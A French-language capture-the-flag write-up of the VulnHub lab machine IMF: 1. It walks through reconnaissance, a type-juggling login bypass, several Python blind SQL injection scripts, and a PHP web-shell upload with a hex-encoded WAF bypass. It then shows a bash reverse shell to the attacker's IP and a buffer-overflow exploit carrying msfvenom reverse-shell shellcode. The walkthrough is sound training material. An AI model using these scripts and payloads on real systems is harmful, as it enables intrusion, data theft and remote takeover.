IMF: 1 VulnHub (Writeup)

Skills:

Information Leakage
Abusing Web Page - User Enumeration Vulnerability (Login)
SQLI (SQL Injection) [Boolean Based Blind] + Python Scripting [Manual]
Abusing Image Upload Form [RCE] + WAF Bypass
Custom Binary Exploitation - Ghidra Anlysis
Custom Binary Exploitation - Buffer Overflow x32 bits (ret2reg technique) [Privilege Escalation]

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Reconnaissance de l'adresse IP via arp-scan :

Utilisation de la commande arp-scan pour détecter l'adresse IP de la machine:

arp-scan -I ens33 --localnet --ignoredups

Recherche des ports ouverts avec Nmap : Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap :

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 192.168.71.140 -oG allPorts

Analyse des ports ouverts avec extractport : Utilisation de la fonction extractport pour afficher de manière synthétique les ports ouverts et les copier dans le presse-papiers.

Scan de la version des ports avec Nmap : Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p80 192.168.71.140 -oN targeted

Identification de la version de la machine avec WhatWeb : Utilisation de WhatWeb pour scanner le site internet et identifier la version de la machine (Ubuntu) et d'Apache :

whatweb http://192.168.71.140

Détection des technologies du site avec Wappalyzer :

Utilisation de l'extension Wappalyzer sur Google Chrome pour détecter les technologies utilisées sur le site internet.

Collecte d'informations du site internet :

Collecte d'informations du site internet : En explorant le site, extraction d'informations telles que les noms, prénoms, emails, rôles de l'entreprise, et enregistrement dans le dossier "content" du fichier "data".

Déchiffrement des scripts en base64 :

L'inspection du code source révèle des scripts encodés en base64, et leur décodage révèle le mot "imfadministrator".

Vulnérabilité Type Juggling:

En interceptant la requête avec BurpSuite, nous observons que l'injection de type juggling est réussie avec la chaîne suivante : user=rmichaels&pass[]=

Accès à la Partie Administrative du CMS:

Nous découvrons un fichier "cms.php" avec une variable "pagename" redirigeant vers différents sites après avoir obtenu l'accès à la partie administrative du CMS.

Vulnérabilité SQL Injection:

Détection d'une Vulnérabilité SQL Injection

En ajoutant une apostrophe dans le champ "home", une erreur SQL apparaît, indiquant une possible vulnérabilité à une attaque SQL injection.

Exploitation de la Vulnérabilité SQL Injection

En introduisant l'injection SQL /cms.php?pagename=home' or '1'='1, aucune erreur n'apparaît, confirmant la vulnérabilité.

Extraction du Nom de la Base de Données avec Substring

Maintenant, avec ce point d'entrée, nous utilisons le paramètre "substring" pour trouver les caractères du nom de la base de données, en introduisant des lettres jusqu'à ce qu'il n'y ait plus d'erreurs. Voici un exemple pour les trois premiers caractères :

Première lettre : /cms.php?pagename=home' or substring(database(),1,1)='a
Deuxième lettre : /cms.php?pagename=home' or substring(database(),2,1)='d
Troisième lettre : /cms.php?pagename=home' or substring(database(),3,1)='m

D'abord, un script Python peut automatiser tout le processus pour obtenir le nom de la base de donnée.

#!/usr/bin/python3
from pwn import *
import requests, signal, sys, time, string

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

#Ctrl +c 
signal.signal(signal.SIGINT, def_handler)

#Global Variables
characters = string.ascii_lowercase
main_url = "http://192.168.71.140/imfadministrator/cms.php?pagename="


def sqli():
    headers = {
        'Cookie': 'PHPSESSID=g2dt1a46m4f3qmgnfcuev3qts3'
    }

    data = ""

    p1 = log.progress("SQLI")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 6 ):
        for character in characters:
            sqli_url = main_url + "home' or substring(database(),%d,1)='%s" % (position, character)
            r = requests.get(sqli_url, headers=headers)

            if "Welcome to the IMF Administration." not in r.text:
                data += character 
                p2.status(data)
                break
    p1.success("Brute force SQLI concluded")
    p2.success(data)
if __name__ == '__main__':
    sqli()

Ensuite, un script Python pour automatiser tout le processus pour obtenir les noms de toutes les bases de données.

#!/usr/bin/python3

from pwn import *
import requests, signal, sys, time, string

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

#Ctrl +c 
signal.signal(signal.SIGINT, def_handler)

#Global Variables
characters = string.ascii_lowercase + "_,:" + string.digits
main_url = "http://192.168.71.140/imfadministrator/cms.php?pagename="


def sqli():
    headers = {
        'Cookie': 'PHPSESSID=g2dt1a46m4f3qmgnfcuev3qts3'
    }

    data = ""

    p1 = log.progress("SQLI")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 100):
        for character in characters:
            sqli_url = main_url + "home' or substring((select group_concat(schema_name) from information_schema.schemata),%d,1)='%s" % (position, character)
            r = requests.get(sqli_url, headers=headers)

            if "Welcome to the IMF Administration." not in r.text:
                data += character 
                p2.status(data)
                break
    p1.success("Brute force SQLI concluded")
    p2.success(data)
if __name__ == '__main__':
    sqli()

Maintenant, un script Python pour automatiser tout le processus pour obtenir le nom des tableaux de la bases de donnée (admin).

#!/usr/bin/python3

from pwn import *
import requests, signal, sys, time, string

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

#Ctrl +c 
signal.signal(signal.SIGINT, def_handler)

#Global Variables
characters = string.ascii_lowercase + "_,:" + string.digits
main_url = "http://192.168.71.140/imfadministrator/cms.php?pagename="


def sqli():
    headers = {
        'Cookie': 'PHPSESSID=g2dt1a46m4f3qmgnfcuev3qts3'
    }

    data = ""

    p1 = log.progress("SQLI")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 100):
        for character in characters:
            sqli_url = main_url + "home' or substring((select group_concat(table_name) from information_schema.tables where table_schema='admin'),%d,1)='%s" % (position, chara
cter)
            r = requests.get(sqli_url, headers=headers)

            if "Welcome to the IMF Administration." not in r.text:
                data += character 
                p2.status(data)
                break
    p1.success("Brute force SQLI concluded")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Maintenant, un script Python pour automatiser tout le processus pour obtenir le nom des colonnes de la bases de donnée (admin).

#!/usr/bin/python3

from pwn import *
import requests, signal, sys, time, string

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

#Ctrl +c 
signal.signal(signal.SIGINT, def_handler)

#Global Variables
characters = string.ascii_lowercase + "_,:" + string.digits
main_url = "http://192.168.71.140/imfadministrator/cms.php?pagename="


def sqli():
    headers = {
        'Cookie': 'PHPSESSID=g2dt1a46m4f3qmgnfcuev3qts3'
    }

    data = ""

    p1 = log.progress("SQLI")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 100):
        for character in characters:
            sqli_url = main_url + "home' or substring((select group_concat(column_name) from information_schema.columns where table_schema='admin' and table_name='pages'),%d,1
)='%s" % (position, character)
            r = requests.get(sqli_url, headers=headers)

            if "Welcome to the IMF Administration." not in r.text:
                data += character 
                p2.status(data)
                break
    p1.success("Brute force SQLI concluded")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Maintenant, un script Python pour automatiser tout le processus pour obtenir le contenue de la colonne pagename de bases de donnée (admin).

#!/usr/bin/python3

from pwn import *
import requests, signal, sys, time, string

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

#Ctrl +c 
signal.signal(signal.SIGINT, def_handler)

#Global Variables
characters = string.ascii_lowercase + "$%-/_,;:" + string.digits
main_url = "http://192.168.71.140/imfadministrator/cms.php?pagename="


def sqli():
    headers = {
        'Cookie': 'PHPSESSID=g2dt1a46m4f3qmgnfcuev3qts3'
    }

    data = ""

    p1 = log.progress("SQLI")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 500):
        for character in characters:
            sqli_url = main_url + "home' or substring((select group_concat(pagename) from pages),%d,1)='%s" % (position, character)
            r = requests.get(sqli_url, headers=headers)

            if "Welcome to the IMF Administration." not in r.text:
                data += character 
                p2.status(data)
                break
    p1.success("Brute force SQLI concluded")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Exploration de la Page "tutorials-incomplete":

En ajoutant "tutorials-incomplete" dans l'URL, une page s'affiche avec un QR code.

Analyse du QR Code et Découverte de la Flag MD5

Après le scan du QR code, une flag au format MD5 est obtenue. Le décryptage de cette flag révèle une piste pour la prochaine étape.

Vulnérabilité File Upload Abuse:

Tentative d'Upload du Fichier cmd.php:

Essayez d'uploader le fichier cmd.php contenant :

<?php
  system($_GET['cmd']);
?>

Une erreur se produit, indiquant probablement un blocage de la fonction système.

Interception de la Requête avec BurpSuite:

Modifiez le Content-Type et le nom du fichier en "jpg".

Bypass de la Fonction Système Bloquante:

Pour contourner le blocage, convertissez la fonction système en hexadécimal :

\x73\x79\x73\x74\x65\x6d

Analyse du Code Source pour le Nom du Fichier:

Consultez le code source pour déterminer comment le fichier doit être nommé.

Capacité d'exécution de commandes :

Envoi d'une Reverse Shell:

Utilisez la commande suivante pour envoyer une reverse shell :

bash -c "bash -i >%26 /dev/tcp/192.168.71.128/443 0>%261"

Mettez-vous en écoute sur le port 443.

Accès à la Machine Cible:

Dès que vous avez accès à la machine cible, effectuez les traitement dans le terminal pour travailler plus confortablement.

Élévation des Privilèges:

Exploitation du Buffer Overflow:

Identification du Binaire "agent":

Utilisation de la commande find pour localiser le binaire nommé "agent" sur la machine cible.
Le binaire de 32 bits est trouvé avec un fichier texte indiquant son exécution par le root sur le port 7788.

Transfert du Binaire avec Netcat:

Utilisation de Netcat pour transférer le binaire de la machine cible vers l'équipement de l'attaquant.

Analyse du Code avec ghidra :

Utilisation du logiciel Ghidra pour analyser le code source du binaire.

Identification de la variable "validcode" contenant le code ID en hexadécimal.

Analyse du Buffer Overflow:

Dans la fonction "report()", repérage d'une vulnérabilité de buffer overflow utilisant la fonction "gets".

Exploitation du Buffer Overflow avec GDB:

Création d'une chaîne de 200 caractères "A" pour tester le débordement.

python -c 'print("A"*200)'

Observation du remplacement de l'EIP (Instruction Pointer) avec la commande "pattern create 200".

Identification de l'offset avec la commande "pattern offset $eip".

Verification avec une insertion d'une chaine EIP de 168 A + 4 caractères B:

python -c 'print("A"*168 + "B"*4)'

Validation des protections avec la commande "checksec".

Vérification de l'ASLR:

Recherche des adresses statiques du binaire avec la commande "objdump -d agent | grep -i 'FF D0'".

objdump -d agent | grep -i "FF D0"

Création du Shellcode pour la Reverse Shell:

Utilisation de Metasploit pour générer un shellcode pour une reverse shell.

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.71.128 LPORT=443 -b '\x00\x0a\x0d' -f c

Script Python pour l'Exploitation: Écriture d'un script Python pour se connecter au service vulnérable et exploiter le buffer overflow.

#!/usr/bin/python3 

from struct import pack
import socket 

shellcode = (b"\xbf\x11\x58\xbb\xb7\xdb\xd7\xd9\x74\x24\xf4\x58\x31\xc9"
b"\xb1\x12\x31\x78\x12\x83\xc0\x04\x03\x69\x56\x59\x42\xb8"
b"\xbd\x6a\x4e\xe9\x02\xc6\xfb\x0f\x0c\x09\x4b\x69\xc3\x4a"
b"\x3f\x2c\x6b\x75\x8d\x4e\xc2\xf3\xf4\x26\x15\xab\x40\x36"
b"\xfd\xae\x4e\x37\x45\x27\xaf\x87\xdf\x68\x61\xb4\xac\x8a"
b"\x08\xdb\x1e\x0c\x58\x73\xcf\x22\x2e\xeb\x67\x12\xff\x89"
b"\x1e\xe5\x1c\x1f\xb2\x7c\x03\x2f\x3f\xb2\x44")


offset = 168 
payload = shellcode + b"A" * (offset - len(shellcode)) + pack("<I", 0x08048563) + b"\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 7788))
s.recv(1024)
s.send(b"48093572\n")
s.recv(1024)
s.send(b"3\n")
s.recv(1024)
s.send(payload)

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?